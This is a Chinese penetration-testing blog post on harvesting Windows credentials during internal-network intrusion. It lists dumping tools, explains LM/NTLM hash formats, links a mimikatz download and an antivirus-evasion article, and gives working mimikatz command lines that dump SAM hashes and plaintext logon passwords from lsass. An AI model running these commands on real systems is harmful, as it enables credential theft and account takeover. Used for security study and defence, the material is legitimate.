当前位置:网站首页>内网渗透之内网信息收集(五)
内网渗透之内网信息收集(五)
2022-07-06 09:22:00 【不知名白帽】
凭证信息收集
01凭证获取工具
常用来获取windows密码的工具
- mimikatz
- wce
- pwddump7
- ophcrack
- procdump+mimikatz
- lazagne
02密码hash
LM哈希&NTLM型哈希
winodws hash:
2000 | xp | 2003 | Vista | win7 | 2008 | 2012 | |
LM | √ | √ | √ | ||||
NTLM | √ | √ | √ | √ | √ | √ | √ |
windows本地hash:
http://www.secpulse.com/archives/65256.html
windows系统下hash密码格式:
用户名称:RID:LM-HASH值:NT-HASH值
03mimikatz
mimikatz下载:
链接:https://pan.baidu.com/s/1ZbQM5YrgNyqmHFWBySSJjg
提取码:jryu
非本地交互式凭证获取
mimikatz.exe "log res.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"
mimikatz.exe "log logon.txt" "privilege::debug" "sekurlsa::logonpasswords" "exit"
一般都是通过远程登陆靶机,在靶机内下载mimikatz
log result.txt(将结果传到txt中)
privilege::debug(提权)
token::elevate(模拟令牌:用于将权限提升为SYSTEM (默认)或在框中找到域管理员令牌)
获取到system用户的token
lsadump::sam(获得用户哈希)
sekurlsa::logonpasswords(获取明文密码)
mimikatz1.x版本:
privilege::debug //提升权限
inject::process lsass.exe sekurlsa.dll //注入sekurlsa.dll到lsass.exe进程里
@getLogonPasswords //获取密码
mimikatz免杀:
https://www.freebuf.com/articles/system/234365.html
04get-hashs
边栏推荐
- 7-15 h0161. Find the greatest common divisor and the least common multiple (PTA program design)
- js判断对象是否是数组的几种方式
- 强化学习基础记录
- 7-4 hash table search (PTA program design)
- 搭建域环境(win)
- [modern Chinese history] Chapter 6 test
- Strengthen basic learning records
- 7-7 7003 combination lock (PTA program design)
- The difference between overloading and rewriting
- [modern Chinese history] Chapter V test
猜你喜欢
UGUI—Text
中间件漏洞复现—apache
MATLAB打开.m文件乱码解决办法
(original) make an electronic clock with LCD1602 display to display the current time on the LCD. The display format is "hour: minute: Second: second". There are four function keys K1 ~ K4, and the fun
Using spacedesk to realize any device in the LAN as a computer expansion screen
Canvas foundation 2 - arc - draw arc
Intensive literature reading series (I): Courier routing and assignment for food delivery service using reinforcement learning
SRC mining ideas and methods
HackMyvm靶机系列(3)-visions
Interpretation of iterator related "itertools" module usage
随机推荐
[modern Chinese history] Chapter V test
FAQs and answers to the imitation Niuke technology blog project (II)
【MySQL-表结构与完整性约束的修改(ALTER)】
Yugu p1012 spelling +p1019 word Solitaire (string)
Canvas foundation 2 - arc - draw arc
Nuxtjs快速上手(Nuxt2)
7-15 h0161. Find the greatest common divisor and the least common multiple (PTA program design)
[VMware abnormal problems] problem analysis & Solutions
7-8 7104 约瑟夫问题(PTA程序设计)
撲克牌遊戲程序——人機對抗
JS several ways to judge whether an object is an array
PriorityQueue (large root heap / small root heap /topk problem)
SRC mining ideas and methods
This time, thoroughly understand the MySQL index
7-9 make house number 3.0 (PTA program design)
1. Preliminary exercises of C language (1)
Miscellaneous talk on May 27
Experiment 9 input and output stream (excerpt)
强化学习基础记录
1. First knowledge of C language (1)